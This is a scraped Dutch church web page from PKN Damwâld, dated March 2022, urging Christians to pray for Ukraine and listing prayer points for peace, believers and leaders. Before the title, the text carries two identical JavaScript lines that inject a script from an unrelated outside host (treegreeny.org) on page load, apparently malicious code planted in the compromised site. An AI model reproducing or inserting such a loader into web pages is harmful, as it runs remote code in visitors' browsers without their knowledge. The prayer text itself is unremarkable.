;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); We moeten bidden... - PKN Damwâld

We moeten bidden…

Gepubliceerd op: woensdag 2 maart 2022

We moeten bidden voor Oekraïne en wat daar allemaal gebeurt. We hebben als christen een verantwoordelijk om voorbede te doen. Gewoon in je eigen tijd, terwijl je wandelt of misschien als gebedsgroepen. Gewoon in je eigen woorden. Vanuit je hart.

Onderschat je gebeden niet. God vraagt om onze gebeden. God luistert naar ons gebed.

Maar hoe kunnen we nu concreet bidden?

  • Bid voor vrede. Bidt dat geweld en spanning stopt en dat de leiders aan alle zijden gaan voor een diplomatieke oplossing en vrede op een manier dat het toestaat dat mensen van alle verschillende geloven kunnen leven in vrijheid en vrede.
  • Bidt voor de gelovigen in Oekraïne en Rusland, dat ze bruggen van liefde en hoop bouwen dat elk conflict tussen hun landen overstijgt. Vraag dat God er voor zorgt dat verdeling verdwijnt en dat Zijn kracht zichtbaar zal zijn voor iedereen.
  • Vraag aan God dat Hij de harten opent van de leiders van Rusland en de delen die onder Russische controle staan, dat ze christenen blijven toelaten om God vrijelijk te aanbidden.
  • Als er oorlog uitbreekt worden zo veel onschuldige levens beëindigd en geraakt. Bidt dat de mensenrechten beschermd zullen worden en dat vrede opnieuw zal uitbreken in dit deel van de wereld.
  • Bidt dat God werkt door de diplomatie van landen vanuit de wereld en dat Gods vrede zal overwinnen.

Robert Colijn